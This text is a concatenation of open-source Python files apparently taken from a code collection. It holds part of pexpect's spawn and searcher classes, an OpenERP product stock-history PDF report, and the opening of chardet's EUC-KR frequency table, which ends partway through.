'''This sends the given signal to the child application. In keeping
with UNIX tradition it has a misleading name. It does not necessarily
kill the child unless you send the right signal. '''
# Same as os.kill, but the pid is given for you.
if self.isalive():
os.kill(self.pid, sig)
def _pattern_type_err(self, pattern):
raise TypeError('got {badtype} ({badobj!r}) as pattern, must be one'
' of: {goodtypes}, pexpect.EOF, pexpect.TIMEOUT'\
.format(badtype=type(pattern),
badobj=pattern,
goodtypes=', '.join([str(ast)\
for ast in self.allowed_string_types])
)
)
def compile_pattern_list(self, patterns):
'''This compiles a pattern-string or a list of pattern-strings.
Patterns must be a StringType, EOF, TIMEOUT, SRE_Pattern, or a list of
those. Patterns may also be None which results in an empty list (you
might do this if waiting for an EOF or TIMEOUT condition without
expecting any pattern).
This is used by expect() when calling expect_list(). Thus expect() is
nothing more than::
cpl = self.compile_pattern_list(pl)
return self.expect_list(cpl, timeout)
If you are using expect() within a loop it may be more
efficient to compile the patterns first and then call expect_list().
This avoid calls in a loop to compile_pattern_list()::
cpl = self.compile_pattern_list(my_pattern)
while some_condition:
...
i = self.expect_list(clp, timeout)
...
'''
if patterns is None:
return []
if not isinstance(patterns, list):
patterns = [patterns]
# Allow dot to match \n
compile_flags = re.DOTALL
if self.ignorecase:
compile_flags = compile_flags | re.IGNORECASE
compiled_pattern_list = []
for idx, p in enumerate(patterns):
if isinstance(p, self.allowed_string_types):
p = self._coerce_expect_string(p)
compiled_pattern_list.append(re.compile(p, compile_flags))
elif p is EOF:
compiled_pattern_list.append(EOF)
elif p is TIMEOUT:
compiled_pattern_list.append(TIMEOUT)
elif isinstance(p, type(re.compile(''))):
compiled_pattern_list.append(p)
else:
self._pattern_type_err(p)
return compiled_pattern_list
def expect(self, pattern, timeout=-1, searchwindowsize=-1):
'''This seeks through the stream until a pattern is matched. The
pattern is overloaded and may take several types. The pattern can be a
StringType, EOF, a compiled re, or a list of any of those types.
Strings will be compiled to re types. This returns the index into the
pattern list. If the pattern was not a list this returns index 0 on a
successful match. This may raise exceptions for EOF or TIMEOUT. To
avoid the EOF or TIMEOUT exceptions add EOF or TIMEOUT to the pattern
list. That will cause expect to match an EOF or TIMEOUT condition
instead of raising an exception.
If you pass a list of patterns and more than one matches, the first
match in the stream is chosen. If more than one pattern matches at that
point, the leftmost in the pattern list is chosen. For example::
# the input is 'foobar'
index = p.expect(['bar', 'foo', 'foobar'])
# returns 1('foo') even though 'foobar' is a "better" match
Please note, however, that buffering can affect this behavior, since
input arrives in unpredictable chunks. For example::
# the input is 'foobar'
index = p.expect(['foobar', 'foo'])
# returns 0('foobar') if all input is available at once,
# but returs 1('foo') if parts of the final 'bar' arrive late
After a match is found the instance attributes 'before', 'after' and
'match' will be set. You can see all the data read before the match in
'before'. You can see the data that was matched in 'after'. The
re.MatchObject used in the re match will be in 'match'. If an error
occurred then 'before' will be set to all the data read so far and
'after' and 'match' will be None.
If timeout is -1 then timeout will be set to the self.timeout value.
A list entry may be EOF or TIMEOUT instead of a string. This will
catch these exceptions and return the index of the list entry instead
of raising the exception. The attribute 'after' will be set to the
exception type. The attribute 'match' will be None. This allows you to
write code like this::
index = p.expect(['good', 'bad', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
do_something()
elif index == 1:
do_something_else()
elif index == 2:
do_some_other_thing()
elif index == 3:
do_something_completely_different()
instead of code like this::
try:
index = p.expect(['good', 'bad'])
if index == 0:
do_something()
elif index == 1:
do_something_else()
except EOF:
do_some_other_thing()
except TIMEOUT:
do_something_completely_different()
These two forms are equivalent. It all depends on what you want. You
can also just expect the EOF if you are waiting for all output of a
child to finish. For example::
p = pexpect.spawn('/bin/ls')
p.expect(pexpect.EOF)
print p.before
If you are trying to optimize for speed then see expect_list().
'''
compiled_pattern_list = self.compile_pattern_list(pattern)
return self.expect_list(compiled_pattern_list,
timeout, searchwindowsize)
def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This takes a list of compiled regular expressions and returns the
index into the pattern_list that matched the child output. The list may
also contain EOF or TIMEOUT(which are not compiled regular
expressions). This method is similar to the expect() method except that
expect_list() does not recompile the pattern list on every call. This
may help if you are trying to optimize for speed, otherwise just use
the expect() method. This is called by expect(). If timeout==-1 then
the self.timeout value is used. If searchwindowsize==-1 then the
self.searchwindowsize value is used. '''
return self.expect_loop(searcher_re(pattern_list),
timeout, searchwindowsize)
def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This is similar to expect(), but uses plain string matching instead
of compiled regular expressions in 'pattern_list'. The 'pattern_list'
may be a string; a list or other sequence of strings; or TIMEOUT and
EOF.
This call might be faster than expect() for two reasons: string
searching is faster than RE matching and it is possible to limit the
search to just the end of the input buffer.
This method is also useful when you don't want to have to worry about
escaping regular expression characters that you want to match.'''
if (isinstance(pattern_list, self.allowed_string_types) or
pattern_list in (TIMEOUT, EOF)):
pattern_list = [pattern_list]
def prepare_pattern(pattern):
if pattern in (TIMEOUT, EOF):
return pattern
if isinstance(pattern, self.allowed_string_types):
return self._coerce_expect_string(pattern)
self._pattern_type_err(pattern)
try:
pattern_list = iter(pattern_list)
except TypeError:
self._pattern_type_err(pattern_list)
pattern_list = [prepare_pattern(p) for p in pattern_list]
return self.expect_loop(searcher_string(pattern_list),
timeout, searchwindowsize)
def expect_loop(self, searcher, timeout=-1, searchwindowsize=-1):
'''This is the common loop used inside expect. The 'searcher' should be
an instance of searcher_re or searcher_string, which describes how and
what to search for in the input.
See expect() for other arguments, return value and exceptions. '''
self.searcher = searcher
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
if searchwindowsize == -1:
searchwindowsize = self.searchwindowsize
try:
incoming = self.buffer
freshlen = len(incoming)
while True:
# Keep reading until exception or return.
index = searcher.search(incoming, freshlen, searchwindowsize)
if index >= 0:
self.buffer = incoming[searcher.end:]
self.before = incoming[: searcher.start]
self.after = incoming[searcher.start: searcher.end]
self.match = searcher.match
self.match_index = index
return self.match_index
# No match at this point
if (timeout is not None) and (timeout < 0):
raise TIMEOUT('Timeout exceeded in expect_any().')
# Still have time left, so read more data
c = self.read_nonblocking(self.maxread, timeout)
freshlen = len(c)
time.sleep(0.0001)
incoming = incoming + c
if timeout is not None:
timeout = end_time - time.time()
except EOF:
err = sys.exc_info()[1]
self.buffer = self.string_type()
self.before = incoming
self.after = EOF
index = searcher.eof_index
if index >= 0:
self.match = EOF
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise EOF(str(err) + '\n' + str(self))
except TIMEOUT:
err = sys.exc_info()[1]
self.buffer = incoming
self.before = incoming
self.after = TIMEOUT
index = searcher.timeout_index
if index >= 0:
self.match = TIMEOUT
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise TIMEOUT(str(err) + '\n' + str(self))
except:
self.before = incoming
self.after = None
self.match = None
self.match_index = None
raise
def getwinsize(self):
'''This returns the terminal window size of the child tty. The return
value is a tuple of (rows, cols). '''
TIOCGWINSZ = getattr(termios, 'TIOCGWINSZ', 1074295912)
s = struct.pack('HHHH', 0, 0, 0, 0)
x = fcntl.ioctl(self.child_fd, TIOCGWINSZ, s)
return struct.unpack('HHHH', x)[0:2]
def setwinsize(self, rows, cols):
'''This sets the terminal window size of the child tty. This will cause
a SIGWINCH signal to be sent to the child. This does not change the
physical window size. It changes the size reported to TTY-aware
applications like vi or curses -- applications that respond to the
SIGWINCH signal. '''
# Check for buggy platforms. Some Python versions on some platforms
# (notably OSF1 Alpha and RedHat 7.1) truncate the value for
# termios.TIOCSWINSZ. It is not clear why this happens.
# These platforms don't seem to handle the signed int very well;
# yet other platforms like OpenBSD have a large negative value for
# TIOCSWINSZ and they don't have a truncate problem.
# Newer versions of Linux have totally different values for TIOCSWINSZ.
# Note that this fix is a hack.
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735:
# Same bits, but with sign.
TIOCSWINSZ = -2146929561
# Note, assume ws_xpixel and ws_ypixel are zero.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(self.fileno(), TIOCSWINSZ, s)
def interact(self, escape_character=chr(29),
input_filter=None, output_filter=None):
'''This gives control of the child process to the interactive user (the
human at the keyboard). Keystrokes are sent to the child process, and
the stdout and stderr output of the child process is printed. This
simply echos the child stdout and child stderr to the real stdout and
it echos the real stdin to the child stdin. When the user types the
escape_character this method will stop. The default for
escape_character is ^]. This should not be confused with ASCII 27 --
the ESC character. ASCII 29 was chosen for historical merit because
this is the character used by 'telnet' as the escape character. The
escape_character will not be sent to the child process.
You may pass in optional input and output filter functions. These
functions should take a string and return a string. The output_filter
will be passed all the output from the child process. The input_filter
will be passed all the keyboard input from the user. The input_filter
is run BEFORE the check for the escape_character.
Note that if you change the window size of the parent the SIGWINCH
signal will not be passed through to the child. If you want the child
window size to change when the parent's window size changes then do
something like the following example::
import pexpect, struct, fcntl, termios, signal, sys
def sigwinch_passthrough (sig, data):
s = struct.pack("HHHH", 0, 0, 0, 0)
a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
termios.TIOCGWINSZ , s))
global p
p.setwinsize(a[0],a[1])
# Note this 'p' global and used in sigwinch_passthrough.
p = pexpect.spawn('/bin/bash')
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
p.interact()
'''
# Flush the buffer.
self.write_to_stdout(self.buffer)
self.stdout.flush()
self.buffer = self.string_type()
mode = tty.tcgetattr(self.STDIN_FILENO)
tty.setraw(self.STDIN_FILENO)
if PY3:
escape_character = escape_character.encode('latin-1')
try:
self.__interact_copy(escape_character, input_filter, output_filter)
finally:
tty.tcsetattr(self.STDIN_FILENO, tty.TCSAFLUSH, mode)
def __interact_writen(self, fd, data):
'''This is used by the interact() method.
'''
while data != b'' and self.isalive():
n = os.write(fd, data)
data = data[n:]
def __interact_read(self, fd):
'''This is used by the interact() method.
'''
return os.read(fd, 1000)
def __interact_copy(self, escape_character=None,
input_filter=None, output_filter=None):
'''This is used by the interact() method.
'''
while self.isalive():
r, w, e = self.__select([self.child_fd, self.STDIN_FILENO], [], [])
if self.child_fd in r:
try:
data = self.__interact_read(self.child_fd)
except OSError as e:
# The subprocess may have closed before we get to reading it
if e.errno != errno.EIO:
raise
if output_filter:
data = output_filter(data)
if self.logfile is not None:
self.logfile.write(data)
self.logfile.flush()
os.write(self.STDOUT_FILENO, data)
if self.STDIN_FILENO in r:
data = self.__interact_read(self.STDIN_FILENO)
if input_filter:
data = input_filter(data)
i = data.rfind(escape_character)
if i != -1:
data = data[:i]
self.__interact_writen(self.child_fd, data)
break
self.__interact_writen(self.child_fd, data)
def __select(self, iwtd, owtd, ewtd, timeout=None):
'''This is a wrapper around select.select() that ignores signals. If
select.select raises a select.error exception and errno is an EINTR
error then it is ignored. Mainly this is used to ignore sigwinch
(terminal resize). '''
# if select() is interrupted by a signal (errno==EINTR) then
# we loop back and enter the select() again.
if timeout is not None:
end_time = time.time() + timeout
while True:
try:
return select.select(iwtd, owtd, ewtd, timeout)
except select.error:
err = sys.exc_info()[1]
if err.args[0] == errno.EINTR:
# if we loop back we have to subtract the
# amount of time we already waited.
if timeout is not None:
timeout = end_time - time.time()
if timeout < 0:
return([], [], [])
else:
# something else caused the select.error, so
# this actually is an exception.
raise
##############################################################################
# The following methods are no longer supported or allowed.
def setmaxread(self, maxread):
'''This method is no longer supported or allowed. I don't like getters
and setters without a good reason. '''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the ' +
'maxread member variable.')
def setlog(self, fileobject):
'''This method is no longer supported or allowed.
'''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the logfile ' +
'member variable.')
##############################################################################
# End of spawn class
##############################################################################
class spawnu(spawn):
"""Works like spawn, but accepts and returns unicode strings.
Extra parameters:
:param encoding: The encoding to use for communications (default: 'utf-8')
:param errors: How to handle encoding/decoding errors; one of 'strict'
(the default), 'ignore', or 'replace', as described
for :meth:`~bytes.decode` and :meth:`~str.encode`.
"""
if PY3:
string_type = str
allowed_string_types = (str, )
_chr = staticmethod(chr)
linesep = os.linesep
else:
string_type = unicode
allowed_string_types = (unicode, )
_chr = staticmethod(unichr)
linesep = os.linesep.decode('ascii')
# This can handle unicode in both Python 2 and 3
write_to_stdout = sys.stdout.write
def __init__(self, *args, **kwargs):
self.encoding = kwargs.pop('encoding', 'utf-8')
self.errors = kwargs.pop('errors', 'strict')
self._decoder = codecs.getincrementaldecoder(self.encoding)(errors=self.errors)
super(spawnu, self).__init__(*args, **kwargs)
@staticmethod
def _coerce_expect_string(s):
return s
@staticmethod
def _coerce_send_string(s):
return s
def _coerce_read_string(self, s):
return self._decoder.decode(s, final=False)
def _send(self, s):
return os.write(self.child_fd, s.encode(self.encoding, self.errors))
class searcher_string(object):
'''This is a plain string search helper for the spawn.expect_any() method.
This helper class is for speed. For more powerful regex patterns
see the helper class, searcher_re.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the matching string itself
'''
def __init__(self, strings):
'''This creates an instance of searcher_string. This argument 'strings'
may be a list; a sequence of strings; or the EOF or TIMEOUT types. '''
self.eof_index = -1
self.timeout_index = -1
self._strings = []
for n, s in enumerate(strings):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._strings.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
ss = [(ns[0], ' %d: "%s"' % ns) for ns in self._strings]
ss.append((-1, 'searcher_string:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index,
' %d: TIMEOUT' % self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurence of one of the search
strings. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before. It helps to avoid
searching the same, possibly big, buffer over and over again.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, this returns -1. '''
first_match = None
# 'freshlen' helps a lot here. Further optimizations could
# possibly include:
#
# using something like the Boyer-Moore Fast String Searching
# Algorithm; pre-compiling the search through a list of
# strings into something that can scan the input once to
# search for all N strings; realize that if we search for
# ['bar', 'baz'] and the input is '...foo' we need not bother
# rescanning until we've read three more bytes.
#
# Sadly, I don't know enough about this interesting topic. /grahn
for index, s in self._strings:
if searchwindowsize is None:
# the match, if any, can only be in the fresh data,
# or at the very end of the old data
offset = -(freshlen + len(s))
else:
# better obey searchwindowsize
offset = -searchwindowsize
n = buffer.find(s, offset)
if n >= 0 and (first_match is None or n < first_match):
first_match = n
best_index, best_match = index, s
if first_match is None:
return -1
self.match = best_match
self.start = first_match
self.end = self.start + len(self.match)
return best_index
class searcher_re(object):
'''This is regular expression string search helper for the
spawn.expect_any() method. This helper class is for powerful
pattern matching. For speed, see the helper class, searcher_string.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the re.match object returned by a succesful re.search
'''
def __init__(self, patterns):
'''This creates an instance that searches for 'patterns' Where
'patterns' may be a list or other sequence of compiled regular
expressions, or the EOF or TIMEOUT types.'''
self.eof_index = -1
self.timeout_index = -1
self._searches = []
for n, s in zip(list(range(len(patterns))), patterns):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._searches.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
#ss = [(n, ' %d: re.compile("%s")' %
# (n, repr(s.pattern))) for n, s in self._searches]
ss = list()
for n, s in self._searches:
try:
ss.append((n, ' %d: re.compile("%s")' % (n, s.pattern)))
except UnicodeEncodeError:
# for test cases that display __str__ of searches, dont throw
# another exception just because stdout is ascii-only, using
# repr()
ss.append((n, ' %d: re.compile(%r)' % (n, s.pattern)))
ss.append((-1, 'searcher_re:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index, ' %d: TIMEOUT' %
self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurence of one of the regular
expressions. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, returns -1.'''
first_match = None
# 'freshlen' doesn't help here -- we cannot predict the
# length of a match, and the re module provides no help.
if searchwindowsize is None:
searchstart = 0
else:
searchstart = max(0, len(buffer) - searchwindowsize)
for index, s in self._searches:
match = s.search(buffer, searchstart)
if match is None:
continue
n = match.start()
if first_match is None or n < first_match:
first_match = n
the_match = match
best_index = index
if first_match is None:
return -1
self.start = first_match
self.match = the_match
self.end = self.match.end()
return best_index
def which(filename):
'''This takes a given filename; tries to find it in the environment path;
then checks if it is executable. This returns the full path to the filename
if found and executable. Otherwise this returns None.'''
# Special case where filename contains an explicit path.
if os.path.dirname(filename) != '':
if os.access(filename, os.X_OK):
return filename
if 'PATH' not in os.environ or os.environ['PATH'] == '':
p = os.defpath
else:
p = os.environ['PATH']
pathlist = p.split(os.pathsep)
for path in pathlist:
ff = os.path.join(path, filename)
if os.access(ff, os.X_OK):
return ff
return None
def split_command_line(command_line):
'''This splits a command line into a list of arguments. It splits arguments
on spaces, but handles embedded quotes, doublequotes, and escaped
characters. It's impossible to do this with a regular expression, so I
wrote a little state machine to parse the command line. '''
arg_list = []
arg = ''
# Constants to name the states we can be in.
state_basic = 0
state_esc = 1
state_singlequote = 2
state_doublequote = 3
# The state when consuming whitespace between commands.
state_whitespace = 4
state = state_basic
for c in command_line:
if state == state_basic or state == state_whitespace:
if c == '\\':
# Escape the next character
state = state_esc
elif c == r"'":
# Handle single quote
state = state_singlequote
elif c == r'"':
# Handle double quote
state = state_doublequote
elif c.isspace():
# Add arg to arg_list if we aren't in the middle of whitespace.
if state == state_whitespace:
# Do nothing.
None
else:
arg_list.append(arg)
arg = ''
state = state_whitespace
else:
arg = arg + c
state = state_basic
elif state == state_esc:
arg = arg + c
state = state_basic
elif state == state_singlequote:
if c == r"'":
state = state_basic
else:
arg = arg + c
elif state == state_doublequote:
if c == r'"':
state = state_basic
else:
arg = arg + c
if arg != '':
arg_list.append(arg)
return arg_list
# vi:set sr et ts=4 sw=4 ft=python :
| mit | 6,983,308,128,741,956,000 | 39.476841 | 87 | 0.591751 | false |
bwrsandman/OpenUpgrade | addons/stock/report/product_stock.py | 376 | 4868 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import osv
import time
from openerp.report.interface import report_int
from openerp.report.render import render
import stock_graph
import StringIO
import unicodedata
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_stock(report_int):
def create(self, cr, uid, ids, datas, context=None):
if context is None:
context = {}
registry = openerp.registry(cr.dbname)
product_ids = ids
if 'location_id' in context:
location_id = context['location_id']
else:
warehouse_id = registry['stock.warehouse'].search(cr, uid, [])[0]
location_id = registry['stock.warehouse'].browse(cr, uid, warehouse_id).lot_stock_id.id
loc_ids = registry['stock.location'].search(cr, uid, [('location_id','child_of',[location_id])])
now = time.strftime('%Y-%m-%d')
dt_from = now
dt_to = now
names = dict(registry['product.product'].name_get(cr, uid, product_ids))
for name in names:
names[name] = names[name].encode('utf8')
products = {}
ctx = context.copy()
ctx['location_id'] = loc_ids
prods = registry['product.product']._product_available(cr, uid, product_ids, context=ctx)
for prod in prods.keys():
products[prod] = [(now, prods[prod]['qty_available'])]
prods[prod] = 0
if not loc_ids or not product_ids:
return (False, 'pdf')
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,-qty))
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_dest_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,qty))
dt = dt_from
qty = 0
io = StringIO.StringIO()
gt = stock_graph.stock_graph(io)
for prod_id in products:
prod_name = names.get(prod_id,'Unknown')
if isinstance(prod_name, str):
prod_name = prod_name.decode('utf-8')
prod_name = unicodedata.normalize('NFKD',prod_name)
prod_name = prod_name.encode('ascii','replace')
gt.add(prod_id, prod_name, products[prod_id])
gt.draw()
gt.close()
self.obj = external_pdf(io.getvalue())
self.obj.render()
return (self.obj.pdf, 'pdf')
report_stock('report.stock.product.history')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -4,353,771,666,382,752,300 | 37.03125 | 119 | 0.564708 | false |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/euckrfreq.py | 3121 | 45978 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M text materials include literature and computer technology
# 128 --> 0.79
# 256 --> 0.92
# 512 --> 0.986
# 1024 --> 0.99944
# 2048 --> 0.99999
#
# Idea Distribution Ratio = 0.98653 / (1-0.98653) = 73.24
# Random Distribution Ration = 512 / (2350-512) = 0.279.
#
# Typical Distribution Ratio
EUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0
EUCKR_TABLE_SIZE = 2352
# Char to FreqOrder table ,
EUCKRCharToFreqOrder = ( \
13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722, 87,
1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398,
1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488, 20,1733,1269,1734,
945,1400,1735, 47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739,
116, 987, 813,1401, 683, 75,1204, 145,1740,1741,1742,1743, 16, 847, 667, 622,
708,1744,1745,1746, 966, 787, 304, 129,1747, 60, 820, 123, 676,1748,1749,1750,
1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856,
344,1763,1764,1765,1766, 89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205,
709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779,
1780, 337, 751,1058, 28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782, 19,
1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567,
1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797,
1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802,
1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899,
885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818,
1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409,
1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697,
1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770,
1412,1837,1838, 39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723,
544,1023,1081, 869, 91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416,
1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300,
119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083,
893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857,
1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871,
282, 96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420,
1421, 268,1877,1422,1878,1879,1880, 308,1881, 2, 537,1882,1883,1215,1884,1885,
127, 791,1886,1273,1423,1887, 34, 336, 404, 643,1888, 571, 654, 894, 840,1889,
0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893,
1894,1123, 48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317,
1899, 694,1900, 909, 734,1424, 572, 866,1425, 691, 85, 524,1010, 543, 394, 841,
1901,1902,1903,1026,1904,1905,1906,1907,1908,1909, 30, 451, 651, 988, 310,1910,
1911,1426, 810,1216, 93,1912,1913,1277,1217,1914, 858, 759, 45, 58, 181, 610,
269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375,
1919, 359,1920, 687,1921, 822,1922, 293,1923,1924, 40, 662, 118, 692, 29, 939,
887, 640, 482, 174,1925, 69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870,
217, 854,1163, 823,1927,1928,1929,1930, 834,1931, 78,1932, 859,1933,1063,1934,
1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888,
1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950,
1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065,
1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002,
1283,1222,1960,1961,1962,1963, 36, 383, 228, 753, 247, 454,1964, 876, 678,1965,
1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467,
50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285,
639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971, 7,
103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979,
1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985,
818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994,
1995, 560, 223,1287, 98, 8, 189, 650, 978,1288,1996,1437,1997, 17, 345, 250,
423, 277, 234, 512, 226, 97, 289, 42, 167,1998, 201,1999,2000, 843, 836, 824,
532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003,
2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008, 71,1440, 745,
619, 688,2009, 829,2010,2011, 147,2012, 33, 948,2013,2014, 74, 224,2015, 61,
191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023,
2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591, 52, 724, 246,2031,2032,
2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912,
2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224,
719,1170, 959, 440, 437, 534, 84, 388, 480,1131, 159, 220, 198, 679,2044,1012,
819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050,
2051,2052,2053, 59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681,
499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414,
1444,2064,2065, 41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068,
